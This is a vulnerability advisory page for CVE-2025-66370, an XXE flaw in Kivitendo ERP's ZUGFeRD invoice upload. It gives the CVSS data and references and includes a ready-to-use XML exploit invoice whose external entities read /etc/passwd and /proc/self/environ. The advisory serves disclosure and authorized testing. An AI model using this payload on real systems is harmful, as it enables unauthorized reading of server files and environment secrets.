Security Vulnerability Report
中文
CVE-2025-66370 CVSS 5.0 MEDIUM

CVE-2025-66370

Published: 2025-11-28 04:16:01
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Kivitendo before 3.9.2 allows XXE injection. By uploading an electronic invoice in the ZUGFeRD format, it is possible to read and exfiltrate files from the server's filesystem.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Kivitendo ERP < 3.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?xml version="1.0" encoding="UTF-8"?> <!-- XXE PoC for CVE-2025-66370 - Kivitendo ZUGFeRD Invoice --> <!DOCTYPE invoice [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> <!ENTITY xxe2 SYSTEM "file:///proc/self/environ"> ]> <rsm:CrossIndustryInvoice xmlns:rsm="urn:un:unece:uncefact:data:standard:CrossIndustryInvoice:100p3" xmlns:ram="urn:un:unece:uncefact:data:standard:ReusableAggregateBusinessInformationEntity:100p3" xmlns:udt="urn:un:unece:uncefact:data:standard:UnqualifiedDataType:100p3"> <rsm:ExchangedDocumentContext> <ram:BusinessScenarioSpecifiedDocumentContextParameter> <ram:ID>urn:cen.eu:en16931:2017</ram:ID> </ram:BusinessScenarioSpecifiedDocumentContextParameter> </rsm:ExchangedDocumentContext> <rsm:ExchangedDocument> <ram:ID>&xxe;</ram:ID> <ram:Name>XXE Test Invoice</ram:Name> <ram:TypeCode>380</ram:TypeCode> <ram:IssueDateTime> <udt:DateTimeString format="102">20250101</udt:DateTimeString> </ram:IssueDateTime> </rsm:ExchangedDocument> <rsm:SupplyChainTradeTransaction> <ram:IncludedSupplyChainTradeLineItem> <ram:AssociatedDocumentLineDocument> <ram:LineID>&xxe2;</ram:LineID> </ram:AssociatedDocumentLineDocument> <ram:SpecifiedTradeProduct> <ram:Name>XXE Exfiltrated Data</ram:Name> </ram:SpecifiedTradeProduct> </ram:IncludedSupplyChainTradeLineItem> </rsm:SupplyChainTradeTransaction> </rsm:CrossIndustryInvoice>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66370", "sourceIdentifier": "[email protected]", "published": "2025-11-28T04:16:01.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kivitendo before 3.9.2 allows XXE injection. By uploading an electronic invoice in the ZUGFeRD format, it is possible to read and exfiltrate files from the server's filesystem."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://blog.kivitendo.de/?p=1415", "source": "[email protected]"}, {"url": "https://github.com/kivitendo/kivitendo-erp/blob/fd3f993fc731cbcaa5eb87d55df7c82df4df9c09/doc/changelog", "source": "[email protected]"}, {"url": "https://github.com/kivitendo/kivitendo-erp/commit/1286dee72f9919166178d0cdb5f52f13b0f7d4de", "source": "[email protected]"}, {"url": "https://github.com/kivitendo/kivitendo-erp/commit/f6ba56bd8d22a428534057589baace6b7bfdf2e9", "source": "[email protected]"}, {"url": "https://invoice.secvuln.info", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.